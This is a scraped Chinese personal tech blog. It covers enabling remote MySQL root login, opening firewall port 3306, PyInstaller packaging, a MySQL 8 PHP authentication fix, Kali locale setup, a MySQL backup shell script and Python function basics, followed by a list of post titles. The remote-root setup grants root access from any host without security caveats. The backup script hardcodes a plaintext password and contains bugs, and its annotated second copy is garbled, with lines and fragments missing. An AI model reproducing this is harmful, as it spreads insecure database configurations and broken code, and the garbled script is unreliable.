host: 该字段记录了用户可以从哪个主机连接到数据库。例如，localhost表示只能从本地计算机连接，而%表示从任何主机都可以连接。
user: 这是数据库的用户名。结合host字段，可以确定一个特定的数据库连接权限。
authentication_string: 这是用户的加密后的密码或其他身份验证信息。在MySQL 5.7及之后的版本中，密码字段从password变为了authentication_string。
plugin: 这指示了用于身份验证的插件。例如，常见的值有mysql_native_password和caching_sha2_password。插件决定了密码如何被验证和加密。
:::
修改user表中的Host：update user set host = '%' where user = 'root' and host='localhost';

:::note{title="注"}
这条语句使用的是MySQL的UPDATE语句，它的意思是：在用户表(user)中，将所有用户名为'root'并且主机名为'localhost'的用户的host字段的值更新为'%'。

这里，'%'表示任何主机都可以连接。
:::

最后刷新一下：flush privileges;
这样就可以使用Navicat来连接服务器上的数据库了

查看防火墙状态

在防火墙中开启3306端口

systemctl status firewalld.service

现在是开启状态

如果是关闭状态则运行下面的命令

systemctl start firewalld

开放端口

firewall-cmd --zone=public --list-ports 查看所有打开的端口
firewall-cmd --zone=public --add-port=3306/tcp --permanent # 开放3306端口
firewall-cmd --reload # 配置立即生效

重启防火墙

systemctl restart firewalld.service

在Linux系统中，firewalld是一个用于管理IP包过滤规则的服务，它可以用来保护你的系统免受网络攻击。通过重启firewalld服务，你可以确保任何对防火墙规则的更改都会生效。

当你执行systemctl restart firewalld.service命令时，系统会先停止firewalld服务，然后再重新启动它。这样可以确保所有的防火墙规则都被重新加载并生效。

Navicat连接CentOS7上的数据库

:::info{title="相关信息"}
常用MySQL服务命令：

mysql -u username -p #登录MySQL
quit #退出MySQL
systemctl start mysqld.service #启动MySQL
systemctl stop mysqld.service #结束
systemctl restart mysqld.service #重启
systemctl enable mysqld.service #开机自启
select version(); #查看MySQL版本
:::

python打包可执行文件

casearx@foxmail.com (Casear) — Fri, 08 Dec 2023 13:39:49 GMT

要将Python脚本打包为可执行文件，可以使用`PyInstaller`或`cx_Freeze`等工具。

首先安装`PyInstaller`或`cx_Freeze`：

pip install pyinstaller

或

pip install cx_Freeze

然后使用以下命令将Python脚本打包为可执行文件：

pyinstaller your_script.py

或

cxfreeze your_script.py --target-dir dist

:::info{title="相关信息"}
这将在当前目录下生成一个dist文件夹，其中包含可执行文件和其他必要的文件。可以将这个文件夹发送给其他人，他们就可以直接运行你的Python脚本而无需安装Python解释器。
:::

MySQL8.0以上PHP连接问题

casearx@foxmail.com (Casear) — Wed, 06 Dec 2023 12:08:47 GMT

:::tip{title="提示"}
这个错误是因为MySQL 8.0默认使用了caching_sha2_password身份验证插件，而你的PHP客户端可能不支持这种身份验证方法。你可以尝试以下几种解决方案：
:::

更改MySQL的身份验证方法：你可以尝试在MySQL中更改用户的身份验证方法。打开MySQL 8.1 Command Line Client，然后运行以下命令

ALTER USER 'yourusername'@'localhost' IDENTIFIED WITH mysql_native_password BY 'yourpassword'; 

FLUSH PRIVILEGES;

这里 'yourusername' 和 'yourpassword' 分别替换为你的用户名和密码。

正确的话会提示你输入密码

例：

:::tip{title="提示"}
更新PHP：另一个解决方案是更新PHP到一个版本，该版本支持caching_sha2_password身份验证插件。根据你的错误日志，你正在使用PHPstudy_pro，这可能是你遇到这个问题的原因。你可以尝试更新PHP到最新版本，或者至少更新到7.4或更高版本，因为这些版本支持caching_sha2_password。
:::

使用PDO：你也可以考虑使用PDO扩展来连接MySQL数据库，因为PDO对各种数据库的兼容性更好。

kali设置为中文

casearx@foxmail.com (Casear) — Sun, 16 Jun 2024 10:23:29 GMT

kali-linux系统（vm虚拟机）切换中文

操作步骤

1、新安装的kali需要设置root账户，切换语言的命令需要root权限执行

已经设置了root用户的直接跳转到第二步

新安装的kali需要设置root账号的密码

使用sudo passwd root命令来验证kali账号的密码并设置root密码

sudo passwd root

2、在终端中执行dpkg-reconfigure locales命令

dpkg-reconfigure locales

:::warning{title="注意"}
如果是root用户可直接执行dpkg-reconfigure locales命令

如果是kali用户则需先切换成root用户登陆再进行执行

Kali用户切换到root，执行su root输入密码即可完成切换
:::

弹出该窗口即可
在弹出的窗口按空格取消勾选en_us

取消勾选后翻到最下面勾选zh_ch

勾选之后按tab跳转到确定，按回车确定

勾选zh_ch，再次按tab回车确定，重启kali即可完成切换

shell脚本备份 MySQL数据库

casearx@foxmail.com (Casear) — Tue, 19 Mar 2024 00:13:31 GMT

#!/bin/bash
set -e
name="数据库备份_$(date +%Y-%m-%d_%H-%M-%S).sql"
bendi=/var/backups/mysql
yuancheng=192.168.236.30::backup
user=root
password='MySQL@329958'
sql_host=localhost
if [ ! -d "$bendi" ]; then 
  mkdir -p "$bendi"        
  echo "备份文件夹 $bendi 不存在，已创建该文件夹。"
fi
bak(){
  echo "MySQL bakcup begin at `date`"
  echo "执行MySQLdump，备份文件路径为/var/backups/mysql/$name"
  mysqldump -hlocalhost -uroot -pMySQL@329958 a >/var/backups/mysql/$name
  echo "远程拷贝到192.168.236.30::backup$name"
  rsync -az $bendi$name.$d1 $yuancheng/$name
  echo "MySQL backup end at `date`"
}
bak >>${bendi}/mysqldump日志.log 2>>${bendi}/rsync日志.err
echo $("备份成功")
set +e

set -e 表示一旦执行命令出现错误，就立即退出脚本

"数据库备份_$(date +%Y-%m-%d_%H-%M-%S).sql" # 定义备份文件名，包含当前时间
bendi=/var/backups/mysql # 定义本地备份路径
yuancheng=192.168.236.30::backup # 定义远程备份路径
user=root # 定义MySQL用户名
password='MySQL@329958' # 定义MySQL密码
sql_host=localhost # 定义MySQL主机地址

如果本地备份路径不存在，则创建该路径

if [!-d "$bendi"]; then 
  mkdir -p "$bendi"    
echo "备份文件夹 $bendi 不存在，已创建该文件夹。"
fi
echo "备份文件夹 $bendi 不存在，已创建该文件夹。"
fi

定义备份函数

bak(){
echo "MySQL bakcup begin at date" # 输出备份开始时间
echo "执行MySQLdump，备份文件路径为/var/backups/mysql/$name"

使用mysqldump命令备份MySQL数据库，并将备份文件保存到本地备份路径下

echo "

远程拷贝到

$name.$d1 $yuancheng/$name
echo "MySQL backup end at date" # 输出备份结束时间
}

执行备份函数，并将输出结果分别保存到日志文件和错误文件中

log 2>>{bendi}/rsync日志.err

输出备份成功信息

echo $("备份成功")

关闭错误退出模式

set +e

set -e 表示一旦执行命令出现错误，就立即退出脚本，这是一种错误退
出模式。
name="数据库备份_$(date +%Y-%m-%d_%H-%M-%S).sql" 定义备份文件
名，包含当前时间，以便于区分备份文件。
bendi=/var/backups/mysql 定义本地备份路径，即备份文件保存的路
径。
yuancheng=192.168.236.30::backup 定义远程备份路径，即备份文件同
步到远程服务器的路径。
user=root 定义MySQL用户名。
password='MySQL@329958' 定义MySQL密码。
sql_host=localhost 定义MySQL主机地址。
[ ! -d "$bendi" ] 判断本地备份路径是否存在，如果不存在则创建该路
径。
bak() 是一个备份函数，主要功能是使用 mysqldump 命令备份MySQL
数据库，并使用 rsync 命令将备份文件同步到远程服务器上。
bak >>${bendi}/mysqldump日志.log 2>>${bendi}/rsync日志.err 执行备
份函数，并将输出结果分别保存到日志文件和错误文件中。
echo "备份成功" 输出备份成功信息。
set +e 关闭错误退出模式，这是为了避免在脚本执行过程中出现错误而
导致整个脚本退出。

python定义函数

casearx@foxmail.com (Casear) — Fri, 08 Dec 2023 13:39:49 GMT

定义函数的规则

1.函数代码块以 def 关键词开头，后接函数标识符名称和圆括号 ()。

2.任何传入参数和自变量必须放在圆括号中间，圆括号之间可以用于定义参数。

3.函数的第一行语句可以选择性地使用文档字符串—用于存放函数说明。

4.函数内容以冒号 : 起始，并且缩进。

5.return [表达式] 结束函数，选择性地返回一个值给调用方，不带表达式的 return 相当于返回 None

Python 定义函数使用 def 关键字，一般格式如下

def function(args):
    pass
def 函数名（参数列表）:
    函数体

实例实验

def max (a,b):
    if a>=b:
        c=a
    else:
        c =b
    return c
a = int(input(""))
b = int(input(""))
c = int(input(""))
d = max(a,b)
e = max(c,d)
print (e,"最大")

定义max函数

参数列表设置（a,b）

函数体中是一个简单的判断大小的if循环

if条件设置a如何大于等于b，则将a的数值赋值给c
如何a大于等于b不成立，则将b的数值赋值给c，来实现对比ab的大小

函数会在执行到 return c 语句时，将 c 的值作为函数的返回值返回给调用者。

调用函数

使用input函数来输入数值，

int（）函数把input中输入的数值转换为int类型并赋值给a

直接使用函数名和（参数列表）即可调用函数

参数列表中的变量可更换为现有变量，使用函数判断输入的ab哪个最大

判断完后赋值给d，下一个直接判断c和d，因为ab判断的结果已经赋值给了d

下一步使用print直接输出e即可

Casear的技术栈

Fcitx5 输入法配置:切换中文输入法

Fcitx5 输入法配置:解决装好后无法切换中文输入法的问题

1. 设置环境变量

方式一:写入 /etc/environment

方式二:写入 ~/.profile

2. 查看环境变量是否生效

3. 注销并重新登录

参考资料

Razer_GRUB_Theme

Razer_GRUB_Theme

开始

Credits

zsh 环境配置

服务器 zsh 环境配置记录：Zim + p10k + eza + zoxide

字体

配置文件

.zshenv

.zshrc

踩坑记录

启动时 compinit 重复初始化

Windows 编辑配置文件导致 CRLF 污染

Zim 安装脚本不能用 | bash 执行

一键部署

验收

# ThinkPad T490s Linux 指纹模块启用指南（KDE / Kubuntu）

ThinkPad T490s Linux 指纹模块启用指南（KDE / Kubuntu）

一、确认指纹模块是否可用

三、启用登录界面指纹

五、常见问题修复

1. 指纹服务异常

3. 查看已录入指纹

六、安全建议

七、最终效果

八、适用机型说明

九、一键安装命令

十、指纹认证的理论知识

1. Linux 指纹认证的工作原理

硬件层

驱动层

用户空间服务层

认证层（PAM）

2. 指纹录入并不是保存图片

3. 为什么录入时要按压多次

4. 指纹认证的优缺点

优点

缺点

5. 为什么仍然建议保留密码

6. ThinkPad 指纹模块为何兼容性较好

7. 实际使用建议

总结

vanblog使用picgo图床的完整部署教程

图床是什么？

vanblog提供的图床配置页面

配置腾讯云COS

配置Picgo

vanblog备份恢复评论数据

1. 导出 waline 评论数据库

执行恢复

验证恢复

解决 OpenConnect VPN 由于 JScript 引擎丢失导致的 Error 1 深度修复

1. 发现问题

2. 核心修复步骤

3. 总结

Fuck 2025

1-5月 休息 打游戏

6-7月 驾驶证 毕业 退租

7-8月 北京 老毛 麻痹自己

8-9月 老家 等人 乌兰浩特

9-12月 长春 找工作 租房 麻木

如何配置一个虚拟显示器，以便远程没有显示器的系统

解决kde环境下切换登陆屏幕（SDDM）后显示异常

rss

Kubuntu 上安装 显卡驱动 和 EnvyControl

Kubuntu 双显卡配置：EnvyControl + Optimus GPU Switcher

系统与硬件信息

安装 NVIDIA 驱动（推荐开源版本）

运行命令查看可安装驱动

当前推荐驱动

2. 克隆并安装

方式一:写入 `/etc/environment`

方式二:写入 `~/.profile`

`.zshenv`

`.zshrc`

Zim 安装脚本不能用 `| bash` 执行

1-5月休息打游戏

6-7月驾驶证毕业退租

7-8月北京老毛麻痹自己

8-9月老家等人乌兰浩特

9-12月长春找工作租房麻木

Kubuntu 上安装显卡驱动和 EnvyControl

第一章企业内网横向渗透综述

第二章企业内网横向渗透的理论基础

第三章基于ATT&CK的红队实战靶场的实现

第四章企业环境中的安全防御与维护

方法一：使用 `go install`（推荐）

mac 安装第三方应用问题

`ls -l /dev/disk/by-id/` 输出解析

分区格式化挂载